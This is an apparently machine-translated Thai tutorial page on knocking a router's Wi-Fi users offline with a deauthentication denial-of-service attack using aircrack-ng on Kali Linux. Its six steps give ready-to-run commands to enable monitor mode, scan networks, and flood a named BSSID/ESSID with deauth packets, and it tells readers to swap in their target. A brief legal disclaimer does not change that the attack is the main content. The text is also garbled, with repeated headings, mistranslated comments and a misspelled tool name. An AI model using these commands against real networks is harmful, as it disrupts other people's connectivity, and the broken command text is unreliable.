สารบัญ:

วิธีเคาะเราเตอร์ออกจากอินเทอร์เน็ต (ภายใน 10 นาที): 6 ขั้นตอน
วิธีเคาะเราเตอร์ออกจากอินเทอร์เน็ต (ภายใน 10 นาที): 6 ขั้นตอน

วีดีโอ: วิธีเคาะเราเตอร์ออกจากอินเทอร์เน็ต (ภายใน 10 นาที): 6 ขั้นตอน

วีดีโอ: วิธีเคาะเราเตอร์ออกจากอินเทอร์เน็ต (ภายใน 10 นาที): 6 ขั้นตอน
วีดีโอ: ถอด Router เดิมของผู้ให้บริการเดิม เหลือแต่ Rounter ใหม่โดยการเซต VLAN10 เพิ่มความเร็วเน็ต ลดปิง 2024, พฤศจิกายน
Anonim
วิธีเคาะเราเตอร์ออกจากอินเทอร์เน็ต (ภายใน 10 นาที)
วิธีเคาะเราเตอร์ออกจากอินเทอร์เน็ต (ภายใน 10 นาที)

ในบทช่วยสอนนี้ ฉันจะแสดงวิธีเรียกใช้การโจมตี DOS (การปฏิเสธบริการ) กับเราเตอร์ สิ่งนี้จะบล็อกผู้คนจากการใช้เราเตอร์ที่คุณโจมตี

เริ่มต้นด้วย XKCD

บทช่วยสอนนี้จะระบุวิธีเรียกใช้การโจมตีจากระบบ linux เท่านั้น อย่าปล่อยให้สิ่งนี้กีดกันคุณ มันง่ายมากที่จะเรียกใช้ Kali linux เวอร์ชันสด (สิ่งที่ฉันใช้ (aircrack-ng ติดตั้งไว้ล่วงหน้าแล้ว)) หรืออื่นๆ linux distro (หากคุณใช้ linux distro อื่น คุณจะต้องติดตั้ง aircrack-ng) นี่คือสองเว็บไซต์ที่จะแนะนำคุณแม้ว่าจะเรียกใช้ Kali จากไดรฟ์ usb https://docs.kali.org/downloading/kali-linux -live-usb-installhttps://24itworld.wordpress.com/2016/12/11/how-to-run-live-kali-linux-from-usb-drive/

นี่อาจเป็นสิ่งผิดกฎหมายในที่ที่คุณอาศัยอยู่ อย่าเรียกใช้การโจมตีนี้กับเราเตอร์ที่คุณไม่ได้รับอนุญาตให้โจมตี สิ่งนี้ไม่ควรก่อให้เกิดอันตรายหรือความเสียหายต่อเราเตอร์ แต่อาจทำให้เราเตอร์เสียหายได้ คุณต้องยอมรับความเสี่ยงเอง

มาสนุกกันเถอะ

ขั้นตอนที่ 1: ฉันไม่รับผิดชอบหากสิ่งนี้เกิดขึ้น

ฉันไม่รับผิดชอบหากสิ่งนี้เกิดขึ้น
ฉันไม่รับผิดชอบหากสิ่งนี้เกิดขึ้น

ขั้นตอนที่ 2: วิดีโอสำหรับผู้ที่ชื่นชอบหนึ่งรายการ

Image
Image

ขั้นตอนที่ 3: ตั้งค่าอแด็ปเตอร์ Wifi เป็นโหมดมอนิเตอร์

ตั้งค่าอแด็ปเตอร์ Wifi เป็นโหมดมอนิเตอร์
ตั้งค่าอแด็ปเตอร์ Wifi เป็นโหมดมอนิเตอร์

iwconfig #find ชื่ออแด็ปเตอร์ไร้สาย

airmon-ng ตรวจสอบฆ่า #ตรวจสอบให้แน่ใจว่า airmon-ng ไม่ทำงาน

airmon-ng start wlan0 #start airman-ng และตั้งค่า wlan0 เป็นโหมดมอนิเตอร์ (แทนที่ wlan0 ด้วยชื่ออแด็ปเตอร์ wifi ของคุณ)

ขั้นตอนที่ 4: ค้นหาเครือข่ายที่พร้อมใช้งาน

ค้นหาเครือข่ายที่มีอยู่
ค้นหาเครือข่ายที่มีอยู่

iwconfig #find ชื่ออแด็ปเตอร์ wifi (ในกรณีของฉันมันเปลี่ยนเป็น wlan0mon)

airodump-ng wlan0mon # ตรวจสอบเครือข่ายที่พร้อมใช้งานโดยใช้ wlan0mon (แทนที่ wlan0mon ด้วยชื่ออแด็ปเตอร์ wifi ของคุณ)

ขั้นตอนที่ 5: ส่ง Junk Packets

ส่ง Junk Packets
ส่ง Junk Packets
ส่ง Junk Packets
ส่ง Junk Packets

นี่คือคำสั่งสุดท้าย

airplay-ng --deauth 1000 -a C0:56:27:4A:3F:B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon

ตอนนี้ฉันจะอธิบายว่าแต่ละส่วนของคำสั่งนี้ทำอะไร

airplay-ng --deauth 1000 #ภาคนี้ส่งขยะ 1000 ซอง

-a C0:56:27:4A:3F:B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon #ส่งแพ็กเก็ตเหล่านั้นไปยังเราเตอร์ด้วย BSSID "C0:56:27:4A:3F:B2" & ESSID "NETGEAR94 2.4GHz_Ext"

แทนที่ BSSID & ESSID ด้วย BSSID & ESSID ของเราเตอร์ที่คุณต้องการโจมตี

ส่งแพ็กเก็ตเหล่านั้นผ่านอแด็ปเตอร์ wifi "wlan0mon" (แทนที่ wlan0mon ด้วยชื่ออแด็ปเตอร์ wifi ของคุณ)

ขั้นตอนที่ 6: สำเร็จ

ความสำเร็จ!
ความสำเร็จ!

มันง่ายอย่างนั้น

หากต้องการหยุดส่งแพ็กเก็ต ให้กด CTL+C หรือปิดเทอร์มินัล

หากต้องการรันคำสั่งสุดท้ายอีกครั้ง ให้กดลูกศรขึ้นแล้วป้อน

นี่คือเว็บไซต์ของ Aircrack-ng

แนะนำ: